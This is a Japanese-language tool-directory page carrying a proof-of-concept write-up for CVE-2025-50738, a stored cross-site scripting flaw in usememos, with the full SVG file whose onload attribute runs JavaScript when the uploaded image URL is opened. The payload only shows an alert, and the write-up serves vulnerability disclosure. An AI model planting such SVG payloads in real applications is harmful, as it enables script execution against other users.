Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2025-50738-PoC — "usememos"におけるSVG経由の格納型クロスサイト・スクリプティング | Kitploit
ツール/GitHubGitHub/tiemio/cve-2025-50738-poc
脆弱性分析エクスプロイトウェブアプリケーション悪用ウェブセキュリティペネトレーションテスト
GitHubtiemio/cve-2025-50738-poc

CVE-2025-50738-PoC

"usememos"におけるSVG経由の格納型クロスサイト・スクリプティング

リポジトリを見る
5ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2025-50738

これは非常にシンプルです。SVGを介した格納型XSSは、実環境でクロスサイトスクリプティング(XSS)を見つける非常に一般的な方法なので、最初に試したことの一つでした。

Pikapods経由でusememosをデプロイし、フロントページに移動してアカウントを作成しました。 そのアカウントで「thought」を作成しました:

image

そして、以下のペイロードを含むSVGファイルを作成しました:

root@kitploit:~
<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">

<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg" onload="alert(document.domain)">
   <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
</svg>

このペイロードはJavaScriptを実行し、「document.domain」を表示します(つまり、単に「*.pikapod.net」と表示されるだけです)。 そのファイル(この場合はxss6.svgという名前でした)を選択すると、「画像アドレスをコピー」ができました:

image

お気づきのとおり、残念ながらXSSはメインページ内では実行されません。動作させるためにいくつか手法を試しましたが、成功しませんでした。 そこで、コピーしたURLを入力すると、XSSのポップアップが表示され、URLが明らかになります:

image

この脆弱性の詳細については、私のブログ記事( https://tiem.io/cves/cve-2025-50738-stored-xss-via-svg/ )を参照してください。

ツールをダウンロード